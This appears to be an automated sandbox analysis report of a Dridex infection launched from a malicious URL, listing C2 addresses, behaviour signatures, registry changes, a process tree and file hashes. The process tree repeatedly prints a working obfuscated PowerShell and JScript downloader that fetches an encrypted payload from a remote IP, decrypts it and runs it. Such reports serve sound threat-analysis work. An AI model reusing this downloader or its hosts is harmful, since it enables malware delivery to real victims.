Analysis
max time kernel: 67s
max time network: 140s
platform: windows10_x64
resource: win10v20201028
submitted: 10-02-2021 01:20
Static task: static1
URLScan task: urlscan1
Sample: http://enter.testclicktds.xyz/anklmagiccheck/
General

Malware Config
Extracted
Family: dridex
Botnet: 10111
C2:
51.68.224.245:4646
188.165.17.91:8443
173.255.246.77:691
Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
description | pid | process | target process
PID 2132 created 2200 | 2132 | WerFault.exe | IEXPLORE.EXE
PID 2112 created 1004 | 2112 | WerFault.exe | IEXPLORE.EXE
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\65pwm.exe | cryptone
C:\Users\Admin\AppData\Local\Temp\65pwm.exe | cryptone
C:\Users\Admin\AppData\Local\Temp\skrt7.exe | cryptone
C:\Users\Admin\AppData\Local\Temp\skrt7.exe | cryptone
Processes:
resource | yara_rule
behavioral1/memory/3960-33-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
behavioral1/memory/3960-35-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
29 | 2368 | wscript.exe
38 | 3588 | wscript.exe
Executes dropped EXE 2 IoCs
Processes:
pid | process
3960 | 65pwm.exe
2508 | skrt7.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled 2 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 65pwm.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | skrt7.exe
Program crash 2 IoCs
Processes:
pid | pid_target | process | target process
2132 | 2200 | WerFault.exe | IEXPLORE.EXE
2112 | 1004 | WerFault.exe | IEXPLORE.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings
Processes (every key below sits under \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer; the prefix is omitted from the rows):
description | ioc | process
Set value (int) | VersionManager\LastUpdateHighDateTime = "30867274" | iexplore.exe
Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "2225368983" | iexplore.exe
Set value (str) | DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$blogger | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$Discuz! | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$WordPress | iexplore.exe
Key created | Recovery\PendingRecovery | iexplore.exe
Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "2467308149" | IEXPLORE.EXE
Key created | DomainSuggestion\FileNames | iexplore.exe
Set value (int) | FlipAhead\FileVersion = "2016061511" | iexplore.exe
Set value (int) | HistoryJournalCertificate\NextUpdateDate = "319701394" | iexplore.exe
Set value (int) | Recovery\AdminActive\{AFE6B686-6B3D-11EB-BEBD-5649AA4EDE66} = "0" | iexplore.exe
Set value (str) | Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000554cc9e337bf2449b17f1a10e11558d2000000000200000000001066000000010000200000004f826ac82592fc34ac5bcffe7a90d892b2750f10e15b7c468ff646a7574af7f6000000000e8000000002000020000000f3fc58ff5b5479c4dc57bbbaf95222efbcf99d3eb9d479c81c42aa558cb18b90200000003b5e50bfb35b77957eae5d3b65f0f4de77b80205824296416035b19fd7d34667400000001e088c99331c93111cc2c8de7a53171678dd56f61e98ad8d22e1ef221c525ba1004e2c79ad29137a4caf020727edd9f37f019167adaad751a29255452ddf250c | iexplore.exe
Key created | HistoryJournalCertificate | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$vBulletin 4 | iexplore.exe
Key created | Recovery\AdminActive | iexplore.exe
Key created | Main | IEXPLORE.EXE
Key created | VersionManager | iexplore.exe
Set value (int) | VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
Set value (int) | TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = d0ec46934affd601 | iexplore.exe
Key created | FlipAhead\Meta | iexplore.exe
Key created | Main | IEXPLORE.EXE
Set value (int) | VersionManager\LastUpdateLowDateTime = "2225368983" | iexplore.exe
Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "30867274" | iexplore.exe
Key created | VersionManager | IEXPLORE.EXE
Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "30867274" | IEXPLORE.EXE
Key created | TabbedBrowsing\NewTabPage | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$vBulletin 3 | iexplore.exe
Set value (int) | Main\CompatibilityFlags = "0" | iexplore.exe
Key created | Main | IEXPLORE.EXE
Key created | TabbedBrowsing | iexplore.exe
Key created | DomainSuggestion\FileNames\ | iexplore.exe
Key created | FlipAhead | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$MediaWiki | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$Telligent | iexplore.exe
Set value (data) | FlipAhead\Meta\generator$http://www.typepad.com/ | iexplore.exe
Key created | Main\WindowsSearch | iexplore.exe
Key created | DomainSuggestion | iexplore.exe
Set value (int) | DomainSuggestion\NextUpdateDate = "319684801" | iexplore.exe
Key created | Main | iexplore.exe
Set value (str) | Main\FullScreen = "no" | iexplore.exe
Set value (int) | VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000554cc9e337bf2449b17f1a10e11558d200000000020000000000106600000001000020000000d08a19f625a687f7853b536230c01e949b436a40b194039d64ca27b6acdefdc9000000000e8000000002000020000000512caa25a516008dbccfaa3f25c65e0a72c2da4ca05f5ae3c8f2f26f9ceaa61320000000afef16b549769fae820364baf9068529c7f2b41ccc55b5300ba7a8eae901a2224000000066383cd01737b79ff6a2d6c3937f20b34825ca72baba8b8ffb5bf0063d4433aae957c0cba04707a64fe3cb4b4b507c53fab9341cc047ccbf0a01edb476dc4480 | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = f02336934affd601 | iexplore.exe
Set value (int) | FlipAhead\NextUpdateDate = "319733386" | iexplore.exe
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes (identical rows collapsed; the hit count gives how many times each row was recorded):
pid | process | hits
2132 | WerFault.exe | 17
2360 | PowerShell.exe | 3
2112 | WerFault.exe | 17
752 | PowerShell.exe | 3
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 2132 | WerFault.exe
Token: SeBackupPrivilege | 2132 | WerFault.exe
Token: SeDebugPrivilege | 2132 | WerFault.exe
Token: SeDebugPrivilege | 2360 | PowerShell.exe
Token: SeDebugPrivilege | 2112 | WerFault.exe
Token: SeDebugPrivilege | 752 | PowerShell.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
1036 | iexplore.exe
Suspicious use of SetWindowsHookEx 10 IoCs
Processes (identical rows collapsed; the hit count gives how many times each row was recorded):
pid | process | hits
1036 | iexplore.exe | 2
2200 | IEXPLORE.EXE | 2
1004 | IEXPLORE.EXE | 2
2544 | IEXPLORE.EXE | 4
Suspicious use of WriteProcessMemory 39 IoCs
Processes (each parent/child pair below was recorded three times):
description | pid | process | target process
PID 1036 wrote to memory of 2200 | 1036 | iexplore.exe | IEXPLORE.EXE
PID 2200 wrote to memory of 2360 | 2200 | IEXPLORE.EXE | PowerShell.exe
PID 2360 wrote to memory of 3012 | 2360 | PowerShell.exe | cmd.exe
PID 3012 wrote to memory of 2368 | 3012 | cmd.exe | wscript.exe
PID 1036 wrote to memory of 1004 | 1036 | iexplore.exe | IEXPLORE.EXE
PID 2368 wrote to memory of 4024 | 2368 | wscript.exe | cmd.exe
PID 4024 wrote to memory of 3960 | 4024 | cmd.exe | 65pwm.exe
PID 1004 wrote to memory of 752 | 1004 | IEXPLORE.EXE | PowerShell.exe
PID 752 wrote to memory of 2380 | 752 | PowerShell.exe | cmd.exe
PID 2380 wrote to memory of 3588 | 2380 | cmd.exe | wscript.exe
PID 1036 wrote to memory of 2544 | 1036 | iexplore.exe | IEXPLORE.EXE
PID 3588 wrote to memory of 2204 | 3588 | wscript.exe | cmd.exe
PID 2204 wrote to memory of 2508 | 2204 | cmd.exe | skrt7.exe
Processes
Process tree; the number in brackets is the nesting depth, and each entry lists its image path, its command line, and the signatures that fired on it.

[1] C:\Program Files\Internet Explorer\iexplore.exe
    Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://enter.testclicktds.xyz/anklmagiccheck/
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:82945 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        Command line: ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx^&fhNIcnC^&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5^&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv^&jcXqsYBEANTI2MQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx^&fhNIcnC^&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5^&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv^&jcXqsYBEANTI2MQ== 1
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\wscript.exe
            Command line: wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx&fhNIcnC&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv&jcXqsYBEANTI2MQ== 1
            - Blocklisted process makes network request
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c 65pwm.exe
              - Suspicious use of WriteProcessMemory

            [7] C:\Users\Admin\AppData\Local\Temp\65pwm.exe
                Command line: 65pwm.exe
                - Executes dropped EXE
                - Checks whether UAC is enabled

    [3] C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2836
        - Suspicious use of NtCreateProcessExOtherParentProcess
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:148483 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        Command line: ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5^&gwHi^&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w^&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y^&tlHZIomhhMzc3Ng== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5^&gwHi^&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w^&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y^&tlHZIomhhMzc3Ng== 1
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\wscript.exe
            Command line: wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5&gwHi&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y&tlHZIomhhMzc3Ng== 1
            - Blocklisted process makes network request
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c skrt7.exe
              - Suspicious use of WriteProcessMemory

            [7] C:\Users\Admin\AppData\Local\Temp\skrt7.exe
                Command line: skrt7.exe
                - Executes dropped EXE
                - Checks whether UAC is enabled

    [3] C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 2336
        - Suspicious use of NtCreateProcessExOtherParentProcess
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:214018 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: d597fc04dcc53bfff367b9bed7afe73b
  SHA1: e025796e44d406b7ba6b14c402393e4c34421c57
  SHA256: 7b86d656246b4c5f24c6e6442f77f424746d7bcfd674cfb9ba3f14cc67203b46
  SHA512: 59ca83231994af55d97b27259a15189899a2e2057622b7fba1d86438f26efa68007f7cb11d9f73593bc5a93564fa4456dd2945627714c32e204a12a4575b7d79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: a2685014fe272db9d786611a568e2fd8
  SHA1: ee6f3e031ee075860f16c260a39dc5d181a20093
  SHA256: ea066d73e24dd590c36a47de51853a8210acaecab5659314c40bbc2181a74b81
  SHA512: 1be33503276399b25c6a417292315b4c7ff68c03dcf82c101779d09675ba95a23af7064dcd458d8ee6b51d1b6a47d026cdf06d6790e38a55b9b1a9fbb62ad373

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PowerShell.exe.log
  MD5: 6bf0e5945fb9da68e1b03bdaed5f6f8d
  SHA1: eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
  SHA256: dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
  SHA512: 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\LZVHKXEJ.htm
  MD5: 3306ee0aca2b8edee4249147ec8d0362
  SHA1: 5645722992de3cd6745277362ce99e724d6a8d91
  SHA256: 7a57686dc1fb845059b652dd87361001cdcf26e62f71a82d3beb6907506ae5e4
  SHA512: f3f3741fcece18b420b9a0f878a6b96b292e918a3b1479de4d3c92923db456d063c3e96b9e7514b6abb7398357e91c493f06b94a743fcf16365363447394565f

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\18A617LC.cookie
  MD5: e44a50f928b5d9a790e759e8a7236eda
  SHA1: 6d4532bdfbef0f348cb4c78f5afbb60c4859e275
  SHA256: 3f1ca018fcaa735955e84408ca43abab6645e02111dcd6c16c69571024d9ec3e
  SHA512: b655674e78eb3592bbb48634a7c054dc516e357892274447f3934b5097c89c10f75ac82f45e3e814449808ac27aaf0c51c22c9456707f46604ad1241c0564442

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 63f63eb15532abcad714ee3f12e3d989
  SHA1: 469eafece7fb7620011564c44e828ffeac88828d
  SHA256: 9c1cc087c665a4c4dec57a2b3a304c9d2c446fdf28d724f23d88bfb8a70d90bf
  SHA512: 50b9a7db65de3687847f3ba1e5272b35d410fb677e30faa6f11f066620b184c2db69609f931df1bed7b98a12e95f6d8691e3ae86b454184f1b2439d0ee3896d2

C:\Users\Admin\AppData\Local\Temp\3.tMp (recorded twice in the report, identical hashes)
  MD5: 88acae3e364010e82fb022c29ab69c9d
  SHA1: 043f08caaf36d317c60977dd9bdaa2be62ed54a0
  SHA256: f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
  SHA512: 38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

C:\Users\Admin\AppData\Local\Temp\65pwm.exe (recorded twice in the report, identical hashes)
  MD5: ebef92a165d8e6665de4593078f82612
  SHA1: 8bd28e7aed262465164ecb5cff9abf052f81b300
  SHA256: 7fcb55deee82d313f0a1bc731511d5cd151760887a0bfd21e6cdaaee2692df0c
  SHA512: 35312c9b20dd2263117e04ad8264cdf07bb4dd9d3bfa5e4cfc3bc978dcc4f78d4d2486942473f94c96e164b6742e1188e23e399de5ff95b1f00da5dba73a59f7

C:\Users\Admin\AppData\Local\Temp\skrt7.exe (recorded twice in the report; same hashes as 65pwm.exe above)
  MD5: ebef92a165d8e6665de4593078f82612
  SHA1: 8bd28e7aed262465164ecb5cff9abf052f81b300
  SHA256: 7fcb55deee82d313f0a1bc731511d5cd151760887a0bfd21e6cdaaee2692df0c
  SHA512: 35312c9b20dd2263117e04ad8264cdf07bb4dd9d3bfa5e4cfc3bc978dcc4f78d4d2486942473f94c96e164b6742e1188e23e399de5ff95b1f00da5dba73a59f7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: ab3931f6ce3108102fb175e8236bf583
  SHA1: 45f9aa7c84e1966dad81a7d410c6ee2274b78a9a
  SHA256: 630bf26f3d3fef07afc35187535ce7e548336595795ea177ec6ca4e9e4789a0f
  SHA512: b3c4f8ee14b7c1b312fedf4e1c132e921c0f54be3677c67e272d68ecc7207d2c2a9537970fb9028bfc6d28419cd47092217bf3c4f38815dabc4e1f2281c53c42
Memory dumps (dump name, then file size where the report gives one):
memory/752-42-0x000000006E630000-0x000000006ED1E000-memory.dmp  Filesize: 6MB
memory/752-51-0x00000000086A0000-0x00000000086A1000-memory.dmp  Filesize: 4KB
memory/752-60-0x00000000073A3000-0x00000000073A4000-memory.dmp  Filesize: 4KB
memory/752-48-0x00000000081B0000-0x00000000081B1000-memory.dmp  Filesize: 4KB
memory/752-54-0x00000000073A2000-0x00000000073A3000-memory.dmp  Filesize: 4KB
memory/752-36-0x0000000000000000-mapping.dmp
memory/752-53-0x00000000073A0000-0x00000000073A1000-memory.dmp  Filesize: 4KB
memory/1004-27-0x0000000000000000-mapping.dmp
memory/2112-37-0x0000000004CC0000-0x0000000004CC1000-memory.dmp  Filesize: 4KB
memory/2132-5-0x0000000004770000-0x0000000004771000-memory.dmp  Filesize: 4KB
memory/2132-4-0x0000000004770000-0x0000000004771000-memory.dmp  Filesize: 4KB
memory/2200-2-0x0000000000000000-mapping.dmp
memory/2204-64-0x0000000000000000-mapping.dmp
memory/2360-16-0x0000000007530000-0x0000000007531000-memory.dmp  Filesize: 4KB
memory/2360-11-0x0000000006C70000-0x0000000006C71000-memory.dmp  Filesize: 4KB
memory/2360-3-0x0000000000000000-mapping.dmp
memory/2360-25-0x0000000006803000-0x0000000006804000-memory.dmp  Filesize: 4KB
memory/2360-7-0x000000006EC60000-0x000000006F34E000-memory.dmp  Filesize: 6MB
memory/2360-8-0x0000000000ED0000-0x0000000000ED1000-memory.dmp  Filesize: 4KB
memory/2360-9-0x0000000006E40000-0x0000000006E41000-memory.dmp  Filesize: 4KB
memory/2360-10-0x0000000006800000-0x0000000006801000-memory.dmp  Filesize: 4KB
memory/2360-12-0x0000000006802000-0x0000000006803000-memory.dmp  Filesize: 4KB
memory/2360-22-0x0000000009270000-0x0000000009271000-memory.dmp  Filesize: 4KB
memory/2360-21-0x0000000008C50000-0x0000000008C51000-memory.dmp  Filesize: 4KB
memory/2360-20-0x0000000008C30000-0x0000000008C31000-memory.dmp  Filesize: 4KB
memory/2360-19-0x0000000008CD0000-0x0000000008CD1000-memory.dmp  Filesize: 4KB
memory/2360-18-0x0000000007C70000-0x0000000007C71000-memory.dmp  Filesize: 4KB
memory/2360-17-0x0000000007DD0000-0x0000000007DD1000-memory.dmp  Filesize: 4KB
